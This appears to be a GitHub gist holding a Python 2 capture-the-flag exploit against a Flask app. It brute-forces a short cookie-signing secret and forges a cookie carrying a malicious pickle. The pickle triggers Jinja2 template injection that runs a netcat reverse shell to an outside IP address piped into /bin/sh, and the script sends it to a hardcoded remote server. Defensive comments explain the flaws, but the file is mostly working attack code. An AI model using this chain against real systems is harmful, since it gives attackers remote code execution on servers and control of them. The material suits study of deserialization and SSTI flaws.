@peternguyen93
Created April 14, 2018 10:10
import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
# class Target(object):
# def __reduce__(self):
# return (__import__, ('json',))
class Target(object):
    """Marker pickle payload: loading it evaluates ``repr('This is marked')``.

    The callable it hands back is ``repr``, so this variant has no side
    effects; it only shows that whatever ``__reduce__`` returns is invoked
    by the unpickling side.
    """

    def __reduce__(self):
        # (reconstructor, positional args) -- the shape the pickle
        # protocol expects from __reduce__.
        reconstructor = repr
        args = ('This is marked',)
        return reconstructor, args
class Import(object):
    """Pickle payload whose reconstruction is ``__import__('flask')``.

    Unpickling runs the returned callable with the returned arguments in the
    loading process, which is the reason ``pickle.loads`` must never be
    applied to bytes the application did not produce itself.
    """

    def __reduce__(self):
        module_name = 'flask'
        # Builtin __import__ is the reconstructor; its single positional
        # argument is the module to load.
        return __import__, (module_name,)
# Jinja2 template text rendered by Execute below.  Because the template
# *source* is attacker-supplied, the expression inside {{ }} is evaluated on
# the rendering side and its os.system call runs there.  The server-side
# mitigation is to render only templates that ship with the application and
# to pass untrusted input as template variables, never as template text; a
# template sandbox is not a substitute for that.
shell = """
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 | /bin/sh | nc 139.59.244.42 31338') }}
{% endif %}
{% endfor %}
"""
class Execute(object):
    """Pickle payload whose reconstruction renders ``shell`` as a template.

    Unpickling calls ``flask.render_template_string(shell)`` in the process
    that loads the pickle.  Two defects combine here: the loader unpickles
    data it did not produce, and the template source it ends up rendering is
    attacker-controlled (server-side template injection).  Fixing the second
    alone is not enough; the server must stop unpickling untrusted bytes.
    """
    def __reduce__(self):
        return (flask.render_template_string, (shell,))
# Base URLs for the two instances; the driver at the bottom of the file
# rebinds `local = remote` before sending anything.
local = 'http://localhost:8888/'
remote = 'http://47.75.151.118:9999/'
def bruteforce():
    """Recover the 4-character cookie-signing secret by exhaustive search.

    The captured cookie has the form ``<sha256 hex>!<base64 data>`` and the
    tag is ``sha256(data + secret)`` (the same construction cretae_cookie
    uses), so each candidate can be checked offline against one cookie.
    Returns the matching secret, or None if no candidate matches.

    Defender's note: this is feasible because the tag is an unkeyed hash over
    ``data + secret`` and the secret is four characters from a 62-symbol
    alphabet (~14.8 million candidates).  A long random secret together with
    an HMAC (verified with hmac.compare_digest) takes the tag out of
    brute-force range.
    """
    server_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
    # Tag and payload are separated by '!'.
    _hash, data = server_cookie.split('!')
    charset = string.ascii_letters + string.digits
    # reverse = charset[::-1]
    for c in charset:
        for k in charset:
            for z in charset:
                for x in charset:
                    secret = c + k + z + x
                    print '[!] Try:',secret
                    if hashlib.sha256(data + secret).hexdigest() == _hash:
                        return secret
def cretae_cookie(data,secret):
    """Return a ``<sha256 hex>!<data>`` cookie value for *data* under *secret*.

    Mirrors the tag construction the cookie uses: ``sha256(data + secret)``.
    This is not an HMAC.  An unkeyed hash over a concatenation, combined with
    a secret short enough to enumerate (see bruteforce), is what lets forged
    values pass.  The server-side fix is ``hmac.new(key, data, sha256)`` with
    a long random key, checked with ``hmac.compare_digest``.
    """
    digest = hashlib.sha256(data + secret)
    tag = digest.hexdigest()
    return '%s!%s' % (tag, data)
# secret = bruteforce()
# print 'Secret:',secret
# Signing secret used for the forged cookies.  The brute-force call above is
# commented out, so this looks like an earlier result of it -- unverified here.
secret = 'hitb'
# Send to the remote instance rather than the local test server.
local = remote
# The cookie body is a base64-encoded pickle.  Presumably the server verifies
# only the sha256 tag before unpickling, which the forged secret satisfies.
# Server-side fix: keep session state server-side, or use a signed serializer
# that cannot execute code on load (e.g. itsdangerous with JSON), never pickle.
data = b64encode(cPickle.dumps(Import()))
cookie = {'location' : cretae_cookie(data,secret)}
print cookie
requests.get(local,cookies=cookie)
# Second request carries the Execute payload under the same forged tag.
cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
print cookie
req = requests.get(local,cookies=cookie)
print req.text